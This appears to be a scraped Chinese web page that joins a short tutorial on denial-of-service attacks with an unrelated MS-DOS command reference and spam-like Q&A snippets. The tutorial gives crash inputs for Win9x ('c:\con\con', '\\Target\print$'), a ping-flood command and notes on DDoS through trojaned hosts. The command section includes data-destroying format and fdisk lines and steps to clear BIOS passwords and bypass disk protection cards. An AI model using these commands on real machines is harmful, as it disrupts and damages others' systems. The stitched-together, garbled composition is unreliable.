B、《TCP/IP 网络管理》，英文名TCP/IP Network Administrator O'REILLY出版，中国电力出版社发行。在P26介绍了“三握手”的细节。

如何

1.1 如何实现DoS

最简单的的DoS是利用WIN9X/ME的“设备名解析漏洞”要测试您是否有该漏洞只需在运行中输入“c:\con\con”如果有蓝屏就是了。其实con是WINDOWS的一个特殊设备……“本身”那么上面的命令系统就理解为进入C盘的C盘的C盘……这样的无限循环。因此你收到的是0X0008或0X000e这样表示内存不足的蓝屏代码。

网络应用主要针对局域网。前提条件是目标主机是WIN9X/ME系统且启动了“文件与打印机共享”

假设我们的目标主机名是“Target”那么在运行中输入“\\Target\print$”回车那边就挂了（其他共享目录也行）。不过在他死机之前你不能使用“开始菜单”。

还一个就是“PING OF DEATH”PING 是一个用来发送ICMP包的DOS命令 通过 －L 参数可以指定 ICMP包的大小，当其大小超过65536字节时就会因为缓冲区溢出而出现碎片。如果持续发送这样的包，对方电脑的CPU就不得不忙于重组这些碎片包，其CPU占用率也将维持在100％的水平上。

幸运的是WINDOWS的PING 只能发送小于65500 的包。当然同时运行多个像这样的命令也有一定的效果－ PING TARGET -L 65500 -T。该方法对WINDOWS2000也奏效。

以上讲的是利用漏洞的DoS方法，它们虽然效果很好但现在都有补丁出来。其实DoS真正可怕的是用NC(NETCAT)这样的管道软件直接向被害者的端口攻击。

1.2 如何实现DDoS？

DDos的优点在于“分布式”上，流程是C-S-T即客户端－傀儡主机－目标机。傀儡主机是桥梁，它一方面接受客户端的指令（如目标机的IP地址，端口）；一方面向目标机发送垃圾数据。

傀儡主机分两种，一种是木马主机。攻击者通过IE、JPEG、RPC等溢出或坑蒙拐骗给傀儡主机装上木马就任由摆布了。冲击波、独裁者正是此类。

第二种是“好人做坏事”，如CC利用IE代理攻击，现在还有人用“手机订购”的搞短信DoS

1.3 如何实现DRDoS？

安全焦点上有一个DRDoS的WIN32程序可用。DRDOS的原理和“中间人攻击”差不多，感兴趣的可以从TCP/IP协议来研究。

2.1如何防御DoS？

2.1.1首先您要有“最小权限原则”。如果你不用共享，就把135、139端口关掉，我就是靠这样躲过冲击波的。

最小权限原则的第二个应用就是使用低权限的用户（不超过POWER USERS)并用NTFS文件系统（将C盘转为NTFS 可运行该命令：convert c: /fs:ntfs ）这样可以免疫大部分的漏洞，病毒也因为权限不够而被雪藏。

2.1.2如果您是个人用户或小型企业，建议用BLACKICE，它不但可以挡住溢出和木马，BAN IP。其内置的入侵监测还能告诉你入侵者的攻击手段和危害。BLACKICE在汉化新世纪有下载。

2.1.3如果您是大型企业，您可能不得不开放像80这样的端口。不过在DoS之前他们一般会先“踩点”，如果有蜜罐或IDS的话，就可以取到数据包的特征码，在防火墙把它们丢掉。

iptables这样的*UNIX防火墙可以定义1S一个IP只能访问一次的规则，也是一个极好的方法。

总之，DoS是一种强大的技术。如果您对它很感兴趣，愿它是你学习TCP/IP协议的动力，而不是复仇的工具。

DOS的另一个解释是Disk Operating System，即磁盘操作系统

概念

1.1什么是DOS?

DOS(Disk Operation System)是一类操作系统的名称，它主要包括Shell(command.com), IO接口(io.sys)两个部分。

Shell是dos的外壳，负责将用户输入的命令翻译成操作系统能够理解的语言。
DOS的IO接口通常实现了一组基于int21h的中断。
目前常用的DOS有包括：MS-DOS PC-DOS，FreeDOS，ROM-DOS等

1.2MS-DOS简介

眼下流行的Windows9x系统是以MS-DOS为基础的。

自从DOS在1981年问世以来，版本就不断更新，从最初的DOS1.0升级到了最新的DOS8.0（Windows ME系统），纯DOS 的最高版本为DOS6.22，这以后的新版本DOS都是由Windows系统所提供的，并不单独存在。

DOS分为核心启动程序和命令程序两个部分。

DOS的核心启动程序有Boot系统引导程序、IO.SYS、MSDOS.SYS和COMMAND.COM。它们是构成DOS系统最基础的几个部分，有了它们系统就可以启动。

但光有启动程序还不行，DOS作为一个字符型的操作系统，一般的操作都是通过命令来完成。DOS命令分为内部命令和外部命令。内部命令是一些常用而所占空间不大的命令程序，如dir、cd等，它们存在于COMMAND.COM文件中，会在系统启动时加载到内存中，以方便调用。而其它的一些外部命令则以单独的可执行文件存在，在使用时才被调入内存。

DOS的优点是快捷。熟练的用户可以通过创建BAT或CMD批处理文件完成一些烦琐的任务，通过一些判断命令（IF、|）甚至可以编一些小程序。因此，即使在XP下CMD还是高手的最爱。

1.3 FAT(32)简介

fat或fat32文件系统是由文件分配表和数据区组成.文件分配表就像字典的目录,上面记录了数据区文件的物理地址.由于WINDOWS是多任务操作系统.在同一时间会有多个文件写入磁盘.因此,您的文件并不是一个一个整齐的存在磁盘上.而是像珍珠一样随机撒布的.串起这些珍珠的线就是文件分配表!

因此,当我们查询文件时,实际上是在查文件分配表,当我们删文件也是在文件分配表上删.这样被"彻底"删除的文件可以恢复就不奇怪了,删除文件或在同一个盘移动文件比复制文件快也是理所当然的.

FAT/FAT32在DOS中是以8.3的格式储存文件的.即最大8个字符的文件名,最大3个字符的扩展名.所谓的扩展名就是文件类型,如.TXT就是ASCII编码的文本文件.如果是这样的文件名:asdfghjk.lkj.hgfd,DOS要如何显示呢?答案是:asdf~1.gfd!聪明的你应该找到规律了吧.

提示一下:FAT(32)和NTFS都是不区分大小写的.

如何

1.1 MS-DOS的常用命令：

1、磁盘操作

fidk 参数 /mbr 重建主引导记录 EXP:fdisk /mbr 重建主引导记录 （可以洗掉还原精灵）

format 参数： /q 快速格式化 /u 不可恢复 /autotest 不提示 /s 创建 MS-DOS 引导盘 EXP:format c: /q /u /autotest

自动快速格式化C盘(危险!!!)

2、目录操作

DIR [目录名或文件名] [/S][/W][/P][/A] 列出目录 参数: /s 查找子目录 /w 只显示文件名 /p 分页 /a 显示隐藏文件 EXP: DIR format.exe /s查找该盘的format.exe文件并报告位置

CD [目录名] PS:可以使用相对目录或绝对目录 进入目录 exp:CD AA 进入当前文件夹下的AA目录,cd .. 进入上一个文件夹cd \返回根目录;cd c:\windows 进入c:\windows文件夹

MKDIR [目录名] 创建目录 EXP:MKDIR HELLOWORLD 创建HELLOWORLD目录

3、文件操作

del [目录名或文件名] [/f][/s][/q] 删除 参数:/f 删除只读文件 /s 删除该目录及其下的所有内容 /q 删除前不确认

exp: del c:\del /s /q 自动删除c盘的del目录

copy [源文件或目录] [目标目录] 复制文件 EXP:copy d:\pwin98\*.* c:\presetup 将d盘的pwin98的所有文件复制到c盘的presetup下

4、内存操作

debug 调试内存 参数 -w [文件名] 写入二进制文件 -o [地址1] [地址2] 输出内存 -q 退出 exp:o 70 10[return] o 71 01

[return] 01[return] q[return] 把70到71的内存都改成01,用以清除AWARDbios密码.debug 还可以破解硬盘保护卡等,但只可
以在纯DOS下用.

DOS命令全集

（一）MD——建立子目录

1．功能：创建新的子目录

2．类型：内部命令

3．格式：MD[盘符：][路径名]〈子目录名〉

4．使用说明：

（1）“盘符”：指定要建立子目录的磁盘驱动器字母，若省略，则为当前驱动器；

（2）“路径名”：要建立的子目录的上级目录名，若缺省则建在当前目录下。

例：（1）在C盘的根目录下创建名为FOX的子目录；（2）在FOX子目录下再创建USER子目录。

C：、＞MD FOX （在当前驱动器C盘下创建子目录FOX）

C：、＞MD FOX 、USER （在FOX 子目录下再创建USER子目录）

（二）CD——改变当前目录

1．功能：显示当前目录

2．类型：内部命令

3．格式：CD[盘符：][路径名][子目录名]

4．使用说明：

（1）如果省略路径和子目录名则显示当前目录；

（2）如采用“CD、”格式，则退回到根目录；

（3）如采用“CD.。”格式则退回到上一级目录。

例：（1）进入到USER子目录；（2）从USER子目录退回到子目录；（3）返回到根目录。

C:、＞CD FOX 、USER（进入FOX子目录下的USER子目录）

C:、FOX、USER＞CD.。 （退回上一级根目录）

C：、FOX＞CD、 （返回到根目录）

C：、＞

（三）RD——删除子目录命令

1．功能：从指定的磁盘删除了目录。

2．类型：内部命令

3．格式：RD[盘符：][路径名][子目录名]

4．使用说明：

（1）子目录在删除前必须是空的，也就是说需要先进入该子目录，使用DEL（删除文件的命令）将其子目录下的文件删空，然后再退回到上一级目录，用RD命令删除该了目录本身；

（2）不能删除根目录和当前目录。

例：要求把C盘FOX子目录下的USER子目录删除，操作如下：

第一步：先将USER子目录下的文件删空；

C、＞DEL C：、FOX、USER、*。*

第二步，删除USER子目录。

C、＞RD C：、FOX、USER

（四）DIR——显示磁盘目录命令

1．功能：显示磁盘目录的内容。

2．类型：内部命令

3．格式：DIR [盘符][路径][/P][/W]

4． 使用说明：/P的使用；当欲查看的目录太多，无法在一屏显示完屏幕会一直往上卷，不容易看清，加上/P参数后，屏幕上会分面一次显示23行的文件信息，然后暂停，并提示；Press any key to continue

/W的使用：加上/W只显示文件名，至于文件大小及建立的日期和时间则都省略。加上参数后，每行可以显示五个文件名。

（五）PATH——路径设置命令

1．功能：设备可执行文件的搜索路径，只对文件有效。

2．类型：内部命令

3．格式：PATH[盘符1]目录[路径名1]{[；盘符2：]，〈目录路径名2〉…}

4．使用说明：

（1）当运行一个可执行文件时，DOS会先在当前目录中搜索该文件，若找到则运行之；若找不到该文件，则根据PATH命令所设置的路径，顺序逐条地到目录中搜索该文件；

（2）PATH命令中的路径，若有两条以上，各路径之间以一个分号“；”隔开；

（3）PATH命令有三种使用方法：

PATH[盘符1：][路径1][盘符2：][路径2]…（设定可执行文件的搜索路径）

PATH：（取消所有路径）

PATH：（显示目前所设的路径）

（六）TREE——显示磁盘目录结构命令

1．功能：显示指定驱动器上所有目录路径和这些目录下的所有文件名。

2．类型：外部命令

3．格式：TREE[盘符：][/F][》PRN]

4．使用说明：

（1）使用/F参数时显示所有目录及目录下的所有文件，省略时，只显示目录，不显示目录下的文件；

（2）选用＞PRN参数时，则把所列目录及目录中的文件名打印输出。

（七）DELTREE——删除整个目录命令

1．功能：将整个目录及其下属子目录和文件删除。

2．类型：外部命令

3．格式：DELTREE[盘符：]〈路径名〉

4．使用说明：该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除，而且不管文件的属性为隐藏、系统或只读，只要该文件位于删除的目录之下，DELTREE都一视同仁，照删不误。使用时务必小心！！！

五、磁盘操作类命令
（一）FORMAT——磁盘格式化命令

1．功能：对磁盘进行格式化，划分磁道和扇区；同时检查出整个磁盘上有无带缺陷的磁道，对坏道加注标记；建立目录区和文件分配表，使磁盘作好接收DOS的准备。

2．类型：外部命令

3．格式：FORMAT〈盘符：〉[/S][/4][/Q]

4．使用说明：

（1）命令后的盘符不可缺省，若对硬盘进行格式化，则会如下列提示：WARNING:ALL DATA ON NON ——REMOVABLE DISK

DRIVE C:WILL BE LOST ！

Proceed with Format (Y/N)？

（警告：所有数据在C盘上，将会丢失，确实要继续格式化吗？）

（2）若是对软盘进行格式化，则会如下提示：Insert mew diskette for drive A;

and press ENTER when ready…

（在A驱中插入新盘，准备好后按回车键）。

（3）选用[/S]参数，将把DOS系统文件IO.SYS 、MSDOS.SYS及COMMAND.COM复制到磁盘上，使该磁盘可以做为DOS启动盘。若不选用/S参数，则格式化后的磙盘只能读写信息，而不能做为启动盘；

（4）选用[/4]参数，在1.2MB的高密度软驱中格式化360KB的低密度盘；

（5）选用[/Q]参数，快速格式化，这个参数并不会重新划分磁盘的磁道貌岸然和扇区，只能将磁盘根目录、文件分配表以及引导扇区清成空白，因此，格式化的速度较快。

（6）选用[/U]参数，表示无条件格式化，即破坏原来磁盘上所有数据。不加/U，则为安全格式化，这时先建立一个镜象文件保存原来的FAT表和根目录，必要时可用UNFORRMAT恢复原来的数据。

（二）UNFORMAT恢复格式化命令

1．功能：对进行过格式化误操作丢失数据的磁盘进行恢复。

2．类型：外部命令

3．格式：UNFORMAT〈盘符〉[/L][/U][/P][/TEST]

4．使用说明：用于将被“非破坏性”格式化的磁盘恢复。根目录下被删除的文件或子目录及磁盘的系统扇区（包括FAT、根目录、BOOT扇区及硬盘分区表）受损时，也可以用UNFORMAT来抢救。

（1）选用/L参数列出找到的子目录名称、文件名称、大孝日期等信息，但不会真的做FORMAT工作。

（2）选用/P参数将显示于屏幕的报告（包含/L参数所产生的信息）同时也送到打印机。运行时屏幕会显示：“Print out will be sent to LPT1”

（3）选用/TEST参数只做模拟试验（TEST）不做真正的写入动作。使用此参数屏幕会显示：“Simulation only”

（4）选用/U参数不使用MIRROR映像文件的数据，直接根据磁盘现状进行UNFORMAT。

（5）选用/PSRTN；修复硬盘分区表。

若在盘符之后加上/P、/L、/TEST之一，都相当于使用了/U参数，UNFORMAT会“假设”此时磁盘没有MIRROR映像文件。

注意：UNFORMAT对于刚FORMAT的磁盘，可以完全恢复，但FORMAT后若做了其它数据的写入，则UNFORMAT就不能完整的救回数据了。UNFORMAT并非是万能的，由于使用UNFORMAT会重建FAT与根目录，所以它也具有较高的危险性，操作不当可能会扩大损失，如果仅误删了几个文件或子目录，只需要利用UNDELETE就够了。
（三） CHKDSK——检查磁盘当前状态命令

1．功能：显示磁盘状态、内存状态和指定路径下指定文件的不连续数目。

2．类型：外部命令

3．格式：CHKDSK [盘符：][路径][文件名][/F][/V]

4．使用说明：

（1）选用[文件名]参数，则显示该文件占用磁盘的情况；

（2）选[/F]参数，纠正在指定磁盘上发现的逻辑错误；

（3）选用[/V]参数，显示盘上的所有文件和路径。

（四）DISKCOPY——整盘复制命令

1．功能：复制格式和内容完全相同的软盘。

2．类型：外部命令

3．格式：DISKCOPY[盘符1：][盘符2：]

4．使用说明：

（1）如果目标软盘没有格式化，则复制时系统自动选进行格式化。

（2）如果目标软盘上原有文件，则复制后将全部丢失。

（3）如果是单驱动器复制，系统会提示适时更换源盘和目标盘，请操作时注意分清源盘和目标盘。
（五）LABEL——建立磁盘卷标命令

1．功能：建立、更改、删除磁盘卷标。

2．类型：外部命令

3．格式：LABEL[盘符：][卷标名]

4．使用说明：

（1）卷标名为要建立的卷标名，若缺省此参数，则系统提示键入卷标名或询问是否删除原有的卷标名；

（2）卷标名由1至11个字符组成。

（六）VOL——显示磁盘卷标命令

1．功能：查看磁盘卷标号。

2．类型：内部命令

3．格式：VOL[盘符：]

4．使用说明：省略盘符，显示当前驱动器卷标。

（七）SCANDISK——检测、修复磁盘命令

1．功能：检测磁盘的FAT表、目录结构、文件系统等是否有问题，并可将检测出的问题加以修复。

2．类型：外部命令

3．格式：SCANDISK[盘符1：]{[盘符2：]…}[/ALL]

4．使用说明：

（1）CCANDISK适用于硬盘和软盘，可以一次指定多个磁盘或选用[/ALL]参数指定所有的磁盘；

（2）可自动检测出磁盘中所发生的交叉连接、丢失簇和目录结构等逻辑上的错误，并加以修复。

（八）DEFRAG——重整磁盘命令

1．。功能：整理磁盘，消除磁盘碎块。

2．类型：外部命令

3．格式：DEFRAG[盘符：][/F]

4．使用说明：选用/F参数，将文件中存在盘上的碎片消除，并调整磁盘文件的安排，确保文件之间毫无空隙。从而加快读盘速度和节省磁盘空间。

（九）SYS——系统复制命令

1．功能：将当前驱动器上的DOS系统文件IO.SYS,MSDOS.SYS和COMMAND.COM 传送到指定的驱动器上。

2．类型：外部命令

3．格式：SYS[盘符：]
文件操作类命令

（一） COPY文件复制命令

1．功能：拷贝一个或多个文件到指定盘上。

2．类型：内部命令

3．格式：COPY [源盘][路径]〈源文件名〉[目标盘][路径][目标文件名]

4．使用说明：

（1）COPY是文件对文件的方式复制数据，复制前目标盘必须已经格式化；

（2）复制过程中，目标盘上相同文件名称的旧文件会被源文件取代；

（3）复制文件时，必须先确定目标般有足够的空间，否则会出现；insufficient的错误信息，提示磁盘空间不够；

（4）文件名中允许使用通配举“*”“？”，可同时复制多个文件；

（5）COPY命令中源文件名必须指出，不可以省略。

（6）复制时，目标文件名可以与源文件名相同，称作“同名拷贝”此时目标文件名可以省略；

（7）复制时，目标文件名也可以与源文件名不相同，称作“异名拷贝”，此时，目标文件名不能省略；

（8）复制时，还可以将几个文件合并为一个文件，称为“合并拷贝”，格式如下：COPY；[源盘][路径]〈源文件名1〉〈源文件名2〉…[目标盘][路径]〈目标文件名〉；

（9）利用COPY命令，还可以从键盘上输入数据建立文件，格式如下：COPY CON [盘符：][路径]〈文件名〉；

（10）注意：COPY命令的使用格式，源文件名与目标文件名之间必须有空格！

（二）XCOPY——目录复制命令

1．功能：复制指定的目录和目录下的所有文件连同目录结构。

2．类型：外部命令

3．格式：XCOPY [源盘：]〈源路径名〉[目标盘符：][目标路径名][/S][/V][/E]

4．使用说明：

（1）XCOPY是COPY的扩展，可以把指定的目录连文件和目录结构一并拷贝，但不能拷贝隐藏文件和系统文件；

（2）使用时源盘符、源目标路径名、源文件名至少指定一个；

（3）选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数，否则/S不会拷贝空目录，若不指定/S参数，则XCOPY只拷贝源目录本身的文件，而不涉及其下的子目录；

（4）选用/V参数时，对的拷贝的扇区都进行较验，但速度会降低。

（三）TYPE——显示文件内容命令

1．功能：显示ASCII码文件的内容。

2．类型：内部命令。

3．格式：TYPE[盘符：][路径]〈文件名〉

4．使用说明：

（1）显示由ASCII码组成的文本文件，对。EXE.COM等为扩展名的文件，其显示的内容是无法阅读的，没有实际意义2；
（2）该命令一次只可以显示一个文件的内容，不能使用通配符；

（3）如果文件有扩展名，则必须将扩展名写上；

（4）当文件较长，一屏显示不下时，可以按以下格式显示；TYPE[盘符：][路径]〈文件名〉|MORE，MORE为分屏显示命令，使用些参数后当满屏时会暂停，按任意键会继续显示。

（5）若需将文件内容打印出来，可用如下格式：

TYPE[盘符：][路径]〈文件名〉，＞PRN

此时，打印机应处于联机状态。

（四） REN——文件改名命令

1．功能：更改文件名称

2．类型：内部命令

3．格式：REN[盘符：][路径]〈旧文件名〉〈新文件名〉

4．使用说明：

（1）新文件名前不可以加上盘符和路径，因为该命令只能对同一盘上的文件更换文件名；

（2）允许使用通配符更改一组文件名或扩展名。

（五）FC——文件比较命令

1．功能：比较文件的异同，并列出差异处。

2．类型：外部命令

3．格式：FC[盘符：][路径名]〈文件名〉[盘符：][路径名][文件名][/A][/B][/C][/N]

4．使用说明：

（1）选用/A参数，为ASCII码比较模式；

（2）选用/B参数，为二进制比较模式；

（3）选用/C参数，将大小写字符看成是相同的字符。

（4）选用/N参数，在ASCII码比较方式下，显示相异处的行号。

（六）ATTRIB——修改文件属性命令

1．功能：修改指定文件的属性。（文件属性参见2.5.4（二）文件属性一节）

2．类型：外部命令。

3．格式：ATTRIB[文件名][R][——R][A][——A][H][——H][S][——S][/S]

4．使用说明：

（1）选用R参数，将指定文件设为只读属性，使得该文件只能读取，无法写入数据或删除；选用——R参数，去除只读属性；

（2）选用A参数，将文件设置为档案属性；选用——A参数，去除档案属性；

（3）选用H参数，将文件调协为隐含属性；选用——H参数，去隐含属性；

（4）选用S参数，将文件设置为系统属性；选用——S参数，去除系统属性；

（5）选用/S参数，对当前目录下的所有子目录及作设置。

(七） DEL——删除文件命令

1．功能：删除指定的文件。

2．类型：内部命令

3．格式：DEL[盘符：][路径]〈文件名〉[/P]

4．使用说明：

（1）选用/P参数，系统在删除前询问是否真要删除该文件，若不使用这个参数，则自动删除；

（2）该命令不能删除属性为隐含或只读的文件；

（3）在文件名称中可以使用通配符；

（4）若要删除磁盘上的所有文件（DEL*·*或DEL·），则会提示：(Arey ou sure？）（你确定吗？）若回答Y，则进行删除，回答N，则取消此次删除作业。

（八） UNDELETE——恢复删除命令

1．功能：恢复被误删除命令

2．类型：外部命令。

3．格式：UNDELETE[盘符：][路径名]〈文件名〉[/DOS]/LIST][/ALL]

4．使用说明：使用UNDELETE可以使用“*”和“？”通配符。

（1）选用/DOS参

运行 cmd 进入DOS 模式
输入 HELP 回车
显示DOS 常用命令

---

合川市15864986200： 常用的DOS运行命令都有什么? - ？
翠乳威凡： 常用的DOS命令有: 1.DIR:列出磁盘文件和目录 DIR命令可以说是DOS中使用最广泛的命令之一,使用后可以列出当前路径下所有的磁盘文件和目录,它的使用参数很多,常见的如:/D:文件按栏分类列出;/p:在每个信息屏幕后暂停;/W:...

合川市15864986200： 常用DOS命令有哪些? - ？
翠乳威凡： DOS和Windows最大的不同在于DOS命令方式操作,所以使用者需要记住大量命令及其格式使用方法,DOS命令分为内部命令和外部命令, 内部命令是随每次启动的COMMAND.COM装入并常驻内存,而外部命令是一条单独的可执行文件.在...

合川市15864986200： DOS操作系统下的命令都有哪些? - ？
翠乳威凡： cd 改变当前目录 sys 制作DOS系统盘 copy 拷贝文件 del 删除文件 deltree 删除目录树 dir 列文件名 diskcopy 制磁盘 edit 文本编辑 format 格式化磁盘 md 建立子目录 mem 查看内存状况 type 显示文件内容 rd 删除目录 ren 改变文件名 记得多少啊,...

合川市15864986200： DOS系统常用的命令有哪些 - ？
翠乳威凡： DOS:disk operate system,磁盘操作系统,DOS命令又分内部命令和外部命令.内部命令又称为驻机命令,它是随着DOS系统的启动同时被加载到内存里且长驻内存.也就是说,只要启动了DOS系统,我们就可以使用内部命令.外部命令是储...

合川市15864986200： DOS 常用命令有什么?？
翠乳威凡： dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录 copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘 edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录名 more 分屏显示 type 显示文件内容 rd 删除目...

合川市15864986200： DOS常用的命令有哪些?？
翠乳威凡： 一、基础命令 1 dir 无参数:查看当前所在目录的文件和文件夹. /s:查看当前目录已经其所有子目录的文件和文件夹. /a:查看包括隐含文件的所有文件. /ah:只显示出隐含文件. /w:以紧凑方式(一行显示5个文件)显示文件和文件夹. ...

合川市15864986200： DOS命令有哪些?？
翠乳威凡： DIR命令(显示目录) MD(建立子目录) CD(改变当前目录) RD(删除子目录) DELTREE(删除目录) TREE(显示目录结构) PATH(设置可执行文件的搜索路索) 以上是目录操作命令TYPE(显示文件内容) ATTRIB(设置或查看文...

合川市15864986200： DOS命令都有哪些? - ？
翠乳威凡： DOS常用命令 要想操作使用DOS,知道一些常用命令是非常重要的.以下是一些命令的用法. 文件名是由文件路径和文件名称合起来的,如C:\DOS\COMMAND.COM. DIR 显示文件和文件夹(目录). 用法:DIR [文件名] [选项] 它有很多选项...

合川市15864986200： 常用的DOS命令有哪些?？
翠乳威凡： msconfigdelattrib netcopyipconfigping

合川市15864986200： dos中的命令？
翠乳威凡： DOS常用命令(转载) 要想操作使用DOS,知道一些常用命令是非常重要的.以下是一些命令的用法. 文件名是由文件路径和文件名称合起来的,如C:\DOS\COMMAND.COM. DIR 显示文件和文件夹(目录). 用法:DIR [文件名] [选项] 它有...